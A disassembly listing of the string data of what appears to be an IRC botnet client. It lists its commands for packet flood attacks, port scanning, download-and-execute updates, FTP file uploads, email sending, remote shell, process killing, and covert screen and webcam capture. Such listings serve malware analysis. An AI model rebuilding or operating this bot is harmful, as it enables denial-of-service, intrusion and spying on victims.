db 70h, 29h, 2
db 3
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 10h
aSynflood db 'synflood',0 ; DATA XREF: sub_401C87+4D93�o
align 4
aSyn db 'syn',0 ; DATA XREF: sub_401C87+4DAA�o
aSkysyn db 'skysyn',0 ; DATA XREF: sub_401C87+4DC1�o
align 4
dword_441DF8 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401C87+4E41�o
aFloodingSSForS db '- Flooding: (%s:%s) for %s seconds.',0
dword_441E28 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401C87+4E9D�o
aFailedToSta_15 db '- Failed to start flood thread, error: <%d>.',0
align 4
aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401C87+4EBF�o
align 10h
aWonk db 'wonk',0 ; DATA XREF: sub_401C87+4ED6�o
align 4
aDownload db 'download',0 ; DATA XREF: sub_401C87+4EED�o
align 4
aDl db 'dl',0 ; DATA XREF: sub_401C87+4F04�o
align 4
aRedirect db 'redirect',0 ; DATA XREF: sub_401C87+4F1B�o
align 4
aRd db 'rd',0 ; DATA XREF: sub_401C87+4F32�o
align 4
aScan db 'scan',0 ; DATA XREF: sub_401C87+4F49�o
align 10h
aSc db 'sc',0 ; DATA XREF: sub_401C87+4F60�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401C87+4F77�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_401C87+4F8E�o
align 4
aC_action db 'c_action',0 ; DATA XREF: sub_401C87+4FA5�o
align 4
aC_a db 'c_a',0 ; DATA XREF: sub_401C87+4FBC�o
aPortscan db 'portscan',0 ; DATA XREF: sub_401C87+4FE2�o
align 4
aPsc db 'psc',0 ; DATA XREF: sub_401C87+4FF9�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_401C87+5010�o
aAsc db 'asc',0 ; DATA XREF: sub_401C87+5027�o
aUdpflood db 'udpflood',0 ; DATA XREF: sub_401C87+503E�o
align 10h
aUdp db 'udp',0 ; DATA XREF: sub_401C87+5055�o
aU: ; DATA XREF: sub_401C87+506C�o
unicode 0, <u>,0
aNetsend db 'netsend',0 ; DATA XREF: sub_401C87+5083�o
aNs db 'ns',0 ; DATA XREF: sub_401C87+509A�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_401C87+50B1�o
align 10h
aPing_0 db 'ping',0 ; DATA XREF: sub_401C87+50C8�o
align 2
aP db 'p',0 ; DATA XREF: sub_401C87+50DF�o
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401C87+50F6�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_401C87+510D�o
aEmail db 'email',0 ; DATA XREF: sub_401C87+5124�o
asc_441F2E db ' ',0 ; DATA XREF: sub_401C87+516E�o
a__0: ; DATA XREF: sub_401C87+5173�o
unicode 0, <_>,0
align 8
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401C87+520F�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
unk_441F84 db 2Dh ; - ; DATA XREF: sub_401C87+5283�o
db 3, 34h, 2
db 65h ; e
db 6Dh, 61h, 69h
db 6Ch ; l
db 2, 3, 2Dh
aMessageSentToS db ' Message sent to %s.',0
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_401C87+52D2�o
aHcon db 'hcon',0 ; DATA XREF: sub_401C87+52E5�o
align 4
aSyn_0 db 'syn',0 ; DATA XREF: sub_401C87+5343�o
aAck db 'ack',0 ; DATA XREF: sub_401C87+535B�o
aRandom_0 db 'random',0 ; DATA XREF: sub_401C87+5372�o
align 4
unk_441FC8 db 2Dh ; - ; DATA XREF: sub_401C87+5382�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTy db '- Invalid flood type specified.',0
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401C87+5417�o
aNormal db 'Normal',0 ; DATA XREF: sub_401C87+541E�o
align 4
unk_442004 db 2Dh ; - ; DATA XREF: sub_401C87+542E�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0
align 4
unk_442038 db 2Dh ; - ; DATA XREF: sub_401C87+5492�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aFailedToSta_16 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_442070 db 2Dh ; - ; DATA XREF: sub_401C87:loc_407135�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidFloodTi db '- Invalid flood time must be greater than 0.',0
align 4
unk_4420A8 db 2Dh ; - ; DATA XREF: sub_401C87+557E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 10h
unk_4420F0 db 2Dh ; - ; DATA XREF: sub_401C87+55D7�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFailedToSta_17 db 'Failed to start flood thread, error: <%d>.',0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401C87+5601�o
align 10h
unk_442140 db 2Dh ; - ; DATA XREF: sub_401C87+561E�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aSendingMessage db '- Sending message %s times to %s using name %s',0
unk_44217C db 2Dh ; - ; DATA XREF: sub_401C87+56CE�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aNetsendDoesNot db '- NetSend does not work on Win9x systems',0
align 4
unk_4421B4 db 2Dh ; - ; DATA XREF: sub_401C87+56F2�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aFailedToSendMe db '- Failed to send message, error <%i>.',0
align 4
unk_4421E8 db 2Dh ; - ; DATA XREF: sub_401C87+5726�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 73h
db 65h ; e
db 6Eh, 64h, 2
db 3
aMessageHasBeen db '- Message has been sent successfuly',0
align 10h
unk_442220 db 2Dh ; - ; DATA XREF: sub_401C87+57D4�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
unk_442268 db 2Dh ; - ; DATA XREF: sub_401C87+582D�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFailedToSta_18 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_4422A0 db 2Dh ; - ; DATA XREF: sub_401C87+5875�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aAlreadyDScan_0 db 'Already %d scanning threads. Too many specified.',0
align 10h
aUpload db 'upload',0 ; DATA XREF: sub_401C87+58AB�o
align 4
unk_4422E8 db 2Dh ; - ; DATA XREF: sub_401C87+58CE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aFileNotFoundS_ db '- File not found: %s.',0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401C87+5954�o
align 4
aAb db 'ab',0 ; DATA XREF: sub_401C87+5965�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401C87+5989�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 10h
aSS_0 db '-s:%s',0 ; DATA XREF: sub_401C87+59A9�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401C87+59C0�o
aOpen_0 db 'open',0 ; DATA XREF: sub_401C87+59C5�o
align 4
unk_442358 db 2Dh ; - ; DATA XREF: sub_401C87+59D9�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFileS db '- Uploading file: %s to: %s',0
align 10h
unk_442380 db 2Dh ; - ; DATA XREF: sub_401C87:loc_407667�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 2
db 3
aUploadingFil_0 db '- Uploading file: %s to: %s failed.',0
align 10h
unk_4423B0 db 2Dh ; - ; DATA XREF: sub_401C87+5B04�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_19 db 'Failed to start scan, port is invalid.',0
align 4
unk_4423E4 db 2Dh ; - ; DATA XREF: sub_401C87+5B61�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_20 db 'Failed to start scan, no IP specified.',0
align 4
aRandom_1 db 'Random',0 ; DATA XREF: sub_401C87+5CA5�o
align 10h
aSequential_0 db 'Sequential',0 ; DATA XREF: sub_401C87+5CAC�o
align 10h
unk_442430 db 2Dh ; - ; DATA XREF: sub_401C87+5CD7�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSPortScanSta_0 db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
db 'inutes using %d threads.',0
align 4
unk_442498 db 2Dh ; - ; DATA XREF: sub_401C87+5D30�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_21 db 'Failed to start scan thread, error: <%d>.',0
align 10h
unk_4424D0 db 2Dh ; - ; DATA XREF: sub_401C87+5DDC�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStarte db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0
align 10h
unk_442520 db 2Dh ; - ; DATA XREF: sub_401C87+5E35�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_22 db 'Failed to start scan thread, error: <%d>.',0
align 4
dword_44255C dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401C87+5EAB�o
dword_442568 dd 5D73255Bh, 25202A20h, 73252073h, 0 ; DATA XREF: sub_401C87+5F3F�o
dword_442578 dd 5D73255Bh, 73253C20h, 7325203Eh, 0 ; DATA XREF: sub_401C87+6041�o
unk_442588 db 2Dh ; - ; DATA XREF: sub_401C87+60C5�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aPortScanStar_0 db 'Port scan started: %s:%d with delay: %d(ms).',0
align 4
unk_4425C4 db 2Dh ; - ; DATA XREF: sub_401C87+611E�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToSta_23 db 'Failed to start scan thread, error: <%d>.',0
align 4
unk_4425FC db 2Dh ; - ; DATA XREF: sub_401C87+61BE�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0
unk_442638 db 2Dh ; - ; DATA XREF: sub_401C87+6217�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0
align 4
unk_44267C db 2Dh ; - ; DATA XREF: sub_401C87+62F8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadingUrl db 'Downloading URL: %s to: %s.',0
unk_4426A8 db 2Dh ; - ; DATA XREF: sub_401C87+6351�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_24 db 'Failed to start transfer thread, error: <%d>.',0
align 4
unk_4426E8 db 2Dh ; - ; DATA XREF: sub_401C87+63DC�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFloodingSForSS db 'Flooding %s for %s seconds using delay %s ms.',0
align 4
unk_442724 db 2Dh ; - ; DATA XREF: sub_401C87+6438�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aFailedToSta_25 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_44275C db 2Dh ; - ; DATA XREF: sub_401C87+64C3�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0
align 4
unk_44278C db 2Dh ; - ; DATA XREF: sub_401C87+651F�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aFailedToSta_26 db '- Failed to start flood thread, error: <%d>.',0
align 4
unk_4427C4 db 2Dh ; - ; DATA XREF: sub_401C87+65BB�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFloodingSSFo_1 db 'Flooding: (%s:%s) for %s seconds.',0
align 4
unk_4427F4 db 2Dh ; - ; DATA XREF: sub_401C87+6617�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aFailedToSta_27 db 'Failed to start flood thread, error: <%d>.',0
align 4
dword_44282C dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401C87+66BE�o
aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0
align 4
dword_44285C dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401C87+6717�o
aFailedToSta_28 db '- Failed to start clone thread, error: <%d>.',0
align 4
unk_442898 db 2Dh ; - ; DATA XREF: sub_401C87+67A3�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0
align 4
unk_4428C4 db 2Dh ; - ; DATA XREF: sub_401C87+6807�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aFailedToSta_29 db 'Failed to start flood thread, error: <%d>.',0
align 4
unk_4428FC db 2Dh ; - ; DATA XREF: sub_401C87:loc_4084AD�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidFlood_0 db 'Invalid flood time must be greater than 0.',0
align 4
unk_442934 db 2Dh ; - ; DATA XREF: sub_401C87+6848�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
dword_442958 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401C87:loc_4084E4�o
unk_442964 db 2Dh ; - ; DATA XREF: sub_401C87+68FB�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingForFi db 'Searching for file: %s in: %s.',0
align 4
unk_442994 db 2Dh ; - ; DATA XREF: sub_401C87+695F�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aFailedToSta_30 db 'Failed to start search thread, error: <%d>.',0
unk_4429D0 db 2Dh ; - ; DATA XREF: sub_401C87+6A11�o
db 3, 34h, 2
db 65h ; e
db 78h, 65h, 63h
db 2
db 3, 2Dh, 20h
aCouldnTExecute db 'Couldn',27h,'t execute file.',0
align 4
dword_4429F4 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h
; DATA XREF: sub_401C87+6A1C�o
dd 7325203Ah, 0
dword_442A10 dd 73257325h, 6578652Eh, 0 ; DATA XREF: sub_401C87+6A7B�o
dword_442A1C dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401C87+6B20�o
aDownloadingUpd db '- Downloading update from: %s.',0
align 4
dword_442A48 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401C87+6B79�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
align 8
dword_442A88 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401C87:loc_40881F�o
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 10h
a332_2 db '332',0 ; DATA XREF: sub_401C87+6BA8�o
aSSSS_0 db '%s %s %s :%s',0 ; DATA XREF: sub_401C87+6BE7�o
align 4
dword_442AE4 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_401C87:loc_4088B2�o
dword_442AF8 dd 323333h ; DATA XREF: sub_401C87+6C45�o
aRepeat_0 db 'repeat',0 ; DATA XREF: sub_401C87+6C6C�o
align 4
aSSSS db '%s %s %s :%s',0 ; DATA XREF: sub_401C87+6C99�o
align 4
dword_442B14 dd 234032Dh, 6E69616Dh, 202D0302h, 65706552h, 203A7461h
; DATA XREF: sub_401C87+6CBF�o
dd 7325h
unk_442B2C db 2Dh ; - ; DATA XREF: sub_401C87:loc_408981�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 10h
unk_442B60 db 2Dh ; - ; DATA XREF: sub_401C87+6D5D�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_442B94 db 2Dh ; - ; DATA XREF: sub_401C87+6DB6�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToSta_31 db '- Failed to start flood thread, error: <%d>.',0
align 10h
dword_442BD0 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401C87+6E2E�o
aFloodingSFor_1 db '- Flooding %s for %s seconds.',0
align 4
dword_442BFC dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401C87+6E87�o
aFailedToSta_32 db '- Failed to start flood thread, error: <%d>.',0
align 4
aPartS_0 db 'PART %s',0 ; DATA XREF: sub_401C87+6ED4�o
aS_22 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+6F0D�o
align 4
aJoinSS_1 db 'JOIN %s %s',0 ; DATA XREF: sub_401C87+6F3F�o
align 4
aS_23 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+6F78�o
align 4
aNickS_6 db 'NICK %s',0 ; DATA XREF: sub_401C87+6F86�o
aS_24 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+6FBE�o
align 4
dword_442C6C dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401C87+6FDD�o
dd 203A2973h, 7325h
dword_442C88 dd 45444F4Dh, 732520h ; DATA XREF: sub_401C87+700D�o
dword_442C90 dd 0A0D7325h, 0 ; DATA XREF: sub_401C87+7046�o
dword_442C98 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401C87+7065�o
dd 203A2973h, 7325h
dword_442CB4 dd 0A0D7325h, 0 ; DATA XREF: sub_401C87+70B2�o
dword_442CBC dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401C87+70D1�o
dd 25203A29h, 73h
dword_442CD8 dd 45444F4Dh, 0D732520h, 0Ah ; DATA XREF: sub_401C87+70FC�o
unk_442CE4 db 2Dh ; - ; DATA XREF: sub_401C87+710A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
a332_3 db '332',0 ; DATA XREF: sub_401C87+711F�o
aPartS_1 db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7134�o
align 10h
aJoinSS_2 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+7161�o
align 10h
dword_442D20 dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_401C87+716E�o
dword_442D34 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401C87+71BA�o
unk_442D40 db 2Dh ; - ; DATA XREF: sub_401C87+71DD�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
unk_442D5C db 2Dh ; - ; DATA XREF: sub_401C87+7237�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 4
unk_442D7C db 2Dh ; - ; DATA XREF: sub_401C87+7277�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 4
aSSSS_1 db '%s %s %s :%s',0 ; DATA XREF: sub_401C87+72EE�o
align 4
unk_442DAC db 2Dh ; - ; DATA XREF: sub_401C87+7317�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 4
unk_442DD4 db 2Dh ; - ; DATA XREF: sub_401C87:loc_408FB4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 4
dword_442E04 dd 234032Dh, 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh
; DATA XREF: sub_401C87+7370�o
dd 2E732520h, 0
aScreen db 'screen',0 ; DATA XREF: sub_401C87:loc_40900F�o
align 4
unk_442E28 db 2Dh ; - ; DATA XREF: sub_401C87+73B9�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
unk_442E54 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409050�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing screen.',0
align 4
unk_442E84 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409057�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 10h
aDrivers db 'drivers',0 ; DATA XREF: sub_401C87:loc_40906A�o
unk_442EC8 db 2Dh ; - ; DATA XREF: sub_401C87+7430�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 10h
unk_442EF0 db 2Dh ; - ; DATA XREF: sub_401C87+7463�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
aFrame db 'frame',0 ; DATA XREF: sub_401C87:loc_4090F7�o
align 10h
unk_442F20 db 2Dh ; - ; DATA XREF: sub_401C87+74E7�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
unk_442F4C db 2Dh ; - ; DATA XREF: sub_401C87:loc_40917E�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 10h
unk_442F80 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409185�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for webcam capture.',0
align 4
aVideo db 'video',0 ; DATA XREF: sub_401C87:loc_409198�o
align 10h
unk_442FC0 db 2Dh ; - ; DATA XREF: sub_401C87+759F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 10h
unk_442FF0 db 2Dh ; - ; DATA XREF: sub_401C87:loc_409239�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing amateur video from webcam.',0
dword_443030 dd 234032Dh, 74706163h, 2657275h, 49202D03h, 6C61766Eh
; DATA XREF: sub_401C87:loc_409243�o
dd 70206469h, 6D617261h, 72657465h, 6F662073h, 6D612072h
dd 75657461h, 69762072h, 206F6564h, 74706163h, 2E657275h
db 2 dup(0)
word_44306E dw 72h ; DATA XREF: sub_401C87:loc_409253�o
unk_443070 db 2Dh ; - ; DATA XREF: sub_401C87+7637�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 4
dword_443094 dd 234032Dh, 6E69616Dh, 202D0302h, 64616552h, 6C696620h
; DATA XREF: sub_401C87+764D�o
dd 61662065h, 64656C69h, 7325203Ah
db 2 dup(0)
word_4430B6 dw 0Ah ; DATA XREF: sub_401C87+7677�o
unk_4430B8 db 2Dh ; - ; DATA XREF: sub_401C87+7695�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
dword_4430E4 dd 234032Dh, 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh
; DATA XREF: sub_401C87+769D�o
dd 732520h
unk_4430FC db 2Dh ; - ; DATA XREF: sub_401C87+76DC�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 4
dword_44311C dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_401C87:loc_40936A�o
dd 746E6573h, 2Eh
dword_443138 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 7325203Ah
; DATA XREF: sub_401C87+778C�o
dd 2Eh
unk_443150 db 2Dh ; - ; DATA XREF: sub_401C87+77E5�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start connection thread, error: <%d>.',0
align 10h
dword_443190 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401C87+7819�o
dd 0
dword_4431A8 dd 7325h ; DATA XREF: sub_401C87+783B�o
unk_4431AC db 2Dh ; - ; DATA XREF: sub_401C87+788D�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
unk_4431D0 db 2Dh ; - ; DATA XREF: sub_401C87+78E6�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_34 db '- Failed to start transfer thread, error: <%d>.',0
align 4
dword_44320C dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h
; DATA XREF: sub_401C87+7915�o
dd 27732527h, 2Eh
dword_443228 dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401C87:loc_4095A3�o
unk_443234 db 2Dh ; - ; DATA XREF: sub_401C87+7960�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 4
unk_443258 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4095EE�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process ID: %s',0
unk_443288 db 2Dh ; - ; DATA XREF: sub_401C87+79BB�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_4432A8 db 2Dh ; - ; DATA XREF: sub_401C87:loc_40964C�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process: %s',0
align 4
unk_4432D8 db 2Dh ; - ; DATA XREF: sub_401C87+79FC�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 4
unk_4432F8 db 2Dh ; - ; DATA XREF: sub_401C87+7A2C�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS__0 db '- Lookup: %s -> %s.',0
align 4
unk_443318 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4096BA�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 10h
unk_443340 db 2Dh ; - ; DATA XREF: sub_401C87+7A53�o
db 3, 34h, 2
db 6Dh ; m
